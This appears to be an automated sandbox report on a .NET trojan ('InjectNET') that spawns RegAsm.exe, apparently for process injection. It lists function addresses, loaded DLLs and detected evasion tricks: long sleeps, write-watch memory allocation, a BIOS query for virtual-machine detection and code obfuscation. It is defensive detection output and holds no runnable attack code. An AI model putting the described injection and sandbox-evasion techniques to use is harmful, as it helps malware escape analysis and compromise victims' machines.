Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004297F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_004297F0

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Code function: 0_2_00CF31B4	0_2_00CF31B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0043406B	3_2_0043406B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042EB21	3_2_0042EB21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BFE1	3_2_0040BFE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040181E	3_2_0040181E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00435830	3_2_00435830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004070A0	3_2_004070A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414160	3_2_00414160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00435110	3_2_00435110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004201C0	3_2_004201C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041C1E0	3_2_0041C1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CA40	3_2_0041CA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00410A4B	3_2_00410A4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00419A55	3_2_00419A55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00404A10	3_2_00404A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411220	3_2_00411220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00432A30	3_2_00432A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00425342	3_2_00425342
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00410B4D	3_2_00410B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041EB5F	3_2_0041EB5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00423300	3_2_00423300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00436B00	3_2_00436B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00407BE0	3_2_00407BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00406B80	3_2_00406B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042DB80	3_2_0042DB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DBA2	3_2_0041DBA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004053B0	3_2_004053B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00423C24	3_2_00423C24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00403C30	3_2_00403C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004354E0	3_2_004354E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CC80	3_2_0040CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402480	3_2_00402480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00435492	3_2_00435492
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411D50	3_2_00411D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00413555	3_2_00413555
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040C510	3_2_0040C510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5E0	3_2_0040B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00405E40	3_2_00405E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CE70	3_2_0041CE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00436E10	3_2_00436E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004086F0	3_2_004086F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CF42	3_2_0041CF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00407750	3_2_00407750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DF69	3_2_0041DF69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00420710	3_2_00420710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00403FD0	3_2_00403FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A7D8	3_2_0041A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040EFE0	3_2_0040EFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401F98	3_2_00401F98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418F9A	3_2_00418F9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00434FB0	3_2_00434FB0

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004091D0 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004099A0 appears 105 times

Sample file is different than original file name gathered from version info

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1252293838.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000000.1232989270.00000000004C6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameConsoleApp66.exe: vs SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Binary or memory string: OriginalFilenameConsoleApp66.exe: vs SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Settings.cs

Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='

Source: classification engine

Classification label: mal100.troj.evad.winEXE@5/1@3/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0042EB21 SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,CoCreateInstance,CoCreateInstance,

3_2_0042EB21

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Mutant created: NULL

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Users\Administrator\Desktop\RunPE-x\ConsoleApp66\obj\Release\ConsoleApp66.pdb source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Binary contains a suspicious time stamp

Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe

Static PE information: 0x8B22E0EF [Mon Dec 21 13:53:51 2043 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Code function: 0_2_00CF2298 push edx; retf 5500h	0_2_00CF2586
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Code function: 0_2_00CF05C9 push esp; retf 0000h	0_2_00CF05CA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Code function: 0_2_00CF0598 push esp; retf 0000h	0_2_00CF05BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Code function: 0_2_00CF0505 push eax; retf 0000h	0_2_00CF050A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Code function: 0_2_00CF0605 push esp; retf 0000h	0_2_00CF060A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0043DABC push eax; retn 0041h	3_2_0043DABD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0043D5A0 push edi; retn 0041h	3_2_0043D5A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0043D63E push eax; iretd	3_2_0043D669

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory allocated: CF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory allocated: 2780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Memory allocated: 4780000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Window / User API: threadDelayed 3224			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Window / User API: threadDelayed 1173			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 6756	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 5920	Thread sleep count: 3224 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 5920	Thread sleep count: 1173 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 6328	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe TID: 6820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6692	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6720	Thread sleep time: -30000s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: RegAsm.exe, 00000003.00000002.1291749878.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`3
